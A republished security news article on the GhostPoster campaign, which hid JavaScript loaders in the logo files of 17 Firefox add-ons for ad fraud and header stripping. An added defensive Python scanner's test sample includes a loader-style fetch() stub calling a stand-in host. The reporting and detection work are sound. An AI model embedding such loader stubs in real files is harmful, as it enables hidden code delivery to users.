Cyber Web Spider Blog – News
GhostPoster Malware Found in 17 Firefox Add-ons with 50,000+ Downloads

Posted on December 17, 2025 By CWS

Dec 17, 2025 | Ravie Lakshmanan | Ad Fraud / Browser Security
A newly discovered campaign named GhostPoster has leveraged logo files associated with 17 Mozilla Firefox browser add-ons to embed malicious JavaScript code designed to hijack affiliate links, inject tracking code, and commit click and ad fraud.
The extensions have been collectively downloaded over 50,000 times, according to Koi Security, which discovered the campaign. The add-ons are no longer available.
These browser programs were marketed as VPNs, screenshot utilities, ad blockers, and unofficial versions of Google Translate. The oldest add-on, Dark Mode, was published on October 25, 2024, offering the ability to enable a dark theme for all websites. The full list of the browser add-ons is below –

Free VPN
Screenshot
Weather (weather-best-forecast)
Mouse Gesture (crxMouse)
Cache – Fast website loader
Free MP3 Downloader
Google Translate (google-translate-right-clicks)
Traductor de Google
World VPN – Free Forever
Dark Reader Dark Mode
Translator – Google Bing Baidu DeepL
Weather (i-like-weather)
Google Translate (google-translate-pro-extension)
谷歌翻译
libretv-watch-free-videos
Ad Stop – Best Ad Blocker
Google Translate (right-click-google-translate)

“What they actually deliver is a multi-stage malware payload that monitors everything you browse, strips away your browser’s security protections, and opens a backdoor for remote code execution,” security researchers Lotan Sery and Noga Gouldman said.
The attack chain begins when the logo file is fetched as one of the above-mentioned extensions is loaded. The malicious code parses the file looking for a marker containing the “===” sign in order to extract JavaScript code: a loader that reaches out to an external server (“www.liveupdt[.]com” or “www.dealctr[.]com”) to retrieve the main payload, waiting 48 hours between each attempt.
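As an added defensive example (not code from the article or from Koi Security), the following Python scanner looks for the pattern the article describes: an image asset whose bytes are followed by a “===” marker and script-like text. The sample bytes, the keyword list and the file-extension filter are constructed assumptions, not indicators taken from the campaign.

```python
"""Scan unpacked extension image assets for a '===' marker followed by script-like text."""
import re
from pathlib import Path

# Magic bytes of common image formats shipped as extension icons/logos.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF8", b"RIFF")
MARKER = b"==="
# Tokens suggesting the bytes after the marker are JavaScript rather than
# leftover image data (constructed heuristic; tune for your environment).
JS_HINTS = re.compile(rb"\b(function|fetch|eval|XMLHttpRequest|setTimeout|document)\b")


def find_marker_payload(data: bytes):
    """Return (marker_offset, trailing_bytes) when an image file carries a
    '===' marker followed by script-like text, otherwise None.
    Binary image data can contain '===' by chance, so the trailing bytes
    must also match a JavaScript keyword before the file is flagged."""
    if not data.startswith(IMAGE_MAGIC):
        return None
    idx = data.find(MARKER)
    if idx == -1:
        return None
    tail = data[idx + len(MARKER):]
    if JS_HINTS.search(tail) is None:
        return None
    return idx, tail


def scan_extension_dir(root: Path):
    """Walk an unpacked extension directory and list suspicious image files
    as (path, marker_offset) pairs."""
    hits = []
    for p in root.rglob("*"):
        if p.suffix.lower() in {".png", ".jpg", ".jpeg", ".gif", ".webp"}:
            found = find_marker_payload(p.read_bytes())
            if found:
                hits.append((str(p), found[0]))
    return hits


# Constructed samples (not real GhostPoster artifacts).
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
# Same image bytes followed by the marker and a loader-style stub.
TAMPERED_PNG = CLEAN_PNG + b"===" + b"(function(){fetch('https://example.invalid/p')})()"

if __name__ == "__main__":
    print("clean   :", find_marker_payload(CLEAN_PNG))
    print("tampered:", find_marker_payload(TAMPERED_PNG))
```

Run scan_extension_dir against an unpacked .xpi (a zip archive) to triage installed add-ons; a hit is a lead for manual review, not proof of compromise on its own.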

To further evade detection, the loader is configured to fetch the payload only 10% of the time. This randomness is a deliberate choice introduced to sidestep efforts to monitor network traffic. The retrieved payload is a custom-encoded, comprehensive toolkit capable of monetizing browser activity without the victims’ knowledge in four different ways –

Affiliate link hijacking, which intercepts affiliate links to e-commerce sites like Taobao or JD.com, depriving legitimate affiliates of their commission
Tracking injection, which inserts Google Analytics tracking code into every web page visited by the victim, to silently profile them
Security header stripping, which removes security headers like Content-Security-Policy and X-Frame-Options from HTTP responses, exposing users to clickjacking and cross-site scripting attacks
Hidden iframe injection, which injects invisible iframes into pages to load URLs from attacker-controlled servers and enable ad and click fraud
CAPTCHA bypass, which employs various techniques to bypass CAPTCHA challenges and evade bot detection safeguards

“Why would malware need to bypass CAPTCHAs? Because some of its operations, like the hidden iframe injections, trigger bot detection,” the researchers explained. “The malware needs to prove it is ‘human’ to keep working.”
In addition to probability checks, the add-ons also incorporate time-based delays that prevent the malware from activating until more than six days after installation. These layered evasion techniques make it harder to detect what is going on behind the scenes.

It is worth emphasizing here that not all of the extensions above use the same steganographic attack chain, but all of them exhibit the same behavior and communicate with the same command-and-control (C2) infrastructure, indicating it is the work of a single threat actor or group that has experimented with different lures and techniques.
The development comes merely days after a popular VPN extension for Google Chrome and Microsoft Edge was caught secretly harvesting AI conversations from ChatGPT, Claude, and Gemini and exfiltrating them to data brokers. In August 2025, another Chrome extension named FreeVPN.One was observed collecting screenshots, system information, and users’ locations.
“Free VPNs promise privacy, but nothing in life comes free,” Koi Security said. “Repeatedly, they deliver surveillance instead.”

Source: The Hacker News. Tags: Addons, Downloads, Firefox, GhostPoster, Malware

Copyright © 2025 Cyber Web Spider Blog – News.